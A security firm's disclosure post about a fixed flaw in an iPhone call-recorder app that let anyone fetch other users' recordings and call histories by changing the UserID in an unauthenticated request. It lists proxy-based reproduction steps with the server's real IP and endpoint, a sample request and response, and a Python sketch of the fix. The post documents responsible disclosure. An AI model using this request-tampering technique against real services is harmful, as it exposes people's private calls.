How we could have listened to anyone's call recordings

March 10, 2021

Note:

This vulnerability was responsibly disclosed by Anand Prakash, PingSafe AI and is now fixed. Special thanks to Zack Whittaker from TechCrunch for helping us with the entire disclosure process and helping in getting this critical vulnerability fixed.
The "Automatic Call Recorder" application is one of the popular applications used by iPhone users to record their calls.
The app is among the top-grossing apps in the Business category of the App Store and is currently #15 by downloads in the Business category worldwide.

Summary:
Anand, with the help of PingSafe AI's threat intelligence product, discovered this vulnerability while doing open source intelligence across mobile applications in different categories. PingSafe AI decompiled the IPA file and identified the S3 buckets, host names and other sensitive details used by the application.
The vulnerability allowed any malicious actor to listen to any user's call recordings from the application's cloud storage bucket, via an unauthenticated API endpoint that leaked the cloud storage URL of the victim's data.

Vulnerability Details:
This vulnerability existed in the "/fetch-sinch-recordings.php" API endpoint of the "Automatic Call Recorder" application. An attacker could pass another user's phone number in the recordings request, and the API would respond with the recording URL in the storage bucket without any authentication. The response also leaked the victim's entire call history, including the numbers that calls were made to.

Steps to Reproduce:
1) Install the "Automatic Call Recorder" application on your phone.
2) Intercept the application's traffic with Burp Suite/ZAP Proxy.
3) You will observe a POST API request to 167.88.123.157:80/fetch-sinch-recordings.php; change UserID to the victim's phone number with country code.
4) The response will contain the S3 URL of the recording and other sensitive details.


Vulnerable Request:

POST /fetch-sinch-recordings.php HTTP/1.1
Host: 167.88.123.157:80
Content-Type: application/json
Connection: close
Accept: */*
User-Agent: CallRecorder/2.25 (com.arun.callrecorderadvanced; build:1; iOS 14.4.0) Alamofire/4.7.3
Accept-Language: en-IN;q=1.0, kn-IN;q=0.9, hi-IN;q=0.8, hi-Latn-IN;q=0.7
Content-Length: 72
Accept-Encoding: gzip, deflate

{
 "UserID": "xxxxxx",
 "AppID": "xxx"
}

Response:


HTTP/1.1 200 OK
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 413
Connection: close
Content-Type: application/json

[
 {
   "start_time": "1604681",
   "start_time_iso": "2019-10-01T17:58:54+0100",
   "caller_number": "xxxxxxx",
   "callee": "+xxxxxxxxx",
   "marked_as_deleted": "0",
   "user_id": "xxxxxxxxxx",
   "sinch_app_id": "xxxxxxxxxxxx",
   "call_id": "xxxxxxx",
   "s3_key": "call_recordings/1011101/xyzrecording.wav"
 }
]
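The root cause is a missing authorization check: the server looked up recordings by whatever UserID the client sent. The following Python sketch is an added example, not the app's actual PHP code, contrasting that pattern with a handler that takes identity from the authenticated session and filters on it; the recording store, session table and phone numbers are constructed, and presign_placeholder stands in for a real storage signing call.

```python
# Added illustration, not the app's own code: the vulnerable lookup pattern
# beside a handler that takes identity from the session. All data below is
# constructed sample data; field names mirror the response shown above.

# Constructed recording store (one row per call, as in the JSON response).
RECORDINGS = [
    {"user_id": "+15550100001", "callee": "+15550100002",
     "s3_key": "call_recordings/1011101/alice-call.wav"},
    {"user_id": "+15550100002", "callee": "+15550100001",
     "s3_key": "call_recordings/1011102/bob-call.wav"},
]

# Constructed session table: bearer token -> authenticated user id.
SESSIONS = {"tok-alice": "+15550100001", "tok-bob": "+15550100002"}


def presign_placeholder(key: str) -> str:
    """Stand-in for a short-lived presigned URL; real code would ask the
    storage SDK to sign the object key with an expiry."""
    return f"https://storage.example/{key}?expires=300&sig=PLACEHOLDER"


def fetch_recordings_vulnerable(body: dict) -> list:
    """The flawed pattern: the lookup key is whatever UserID the client
    sent, and nobody checks who is asking, so any number works."""
    return [r for r in RECORDINGS if r["user_id"] == body.get("UserID")]


def fetch_recordings_fixed(headers: dict, body: dict) -> tuple:
    """Hardened pattern: identity comes from the authenticated session,
    never from the body, and rows are filtered to that identity.
    Returns (http_status, payload) the way an HTTP handler would."""
    token = headers.get("Authorization", "").removeprefix("Bearer ").strip()
    caller = SESSIONS.get(token)
    if caller is None:
        return 401, {"error": "authentication required"}
    # A body UserID that names someone else is rejected; logging such
    # mismatches is also a cheap detection signal for IDOR probing.
    if body.get("UserID", caller) != caller:
        return 403, {"error": "forbidden"}
    rows = [r for r in RECORDINGS if r["user_id"] == caller]
    # Hand out time-limited per-object access rather than raw bucket keys.
    return 200, [{**r, "download": presign_placeholder(r["s3_key"])}
                 for r in rows]
```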




Timelines:
Feb 27th, 2021 09:20 PM IST - Vulnerability discovered by Anand Prakash from PingSafe AI.
Feb 27th, 2021 10:34 PM IST - The company did not have any responsible disclosure program. Reached out to Zack Whittaker for help with the responsible disclosure. Issue forwarded to the developer.
March 6th, 2021 1:16 AM IST - Confirmation from TechCrunch that the new build will be published soon by the developer.
March 6th, 2021 08:52 PM IST - Bug is fixed and the new version is live on the App Store.

Security issues like this are catastrophic in nature. Along with impacting customers' privacy, they also dent the company's image and hand an advantage to competitors.
PingSafe AI uses a state-of-the-art intelligent risk evaluation engine to monitor a company's security health comprehensively by assessing all of its domains, IPs, mobile applications, source code and leaked credentials.

Follow us on LinkedIn and Twitter to get more details.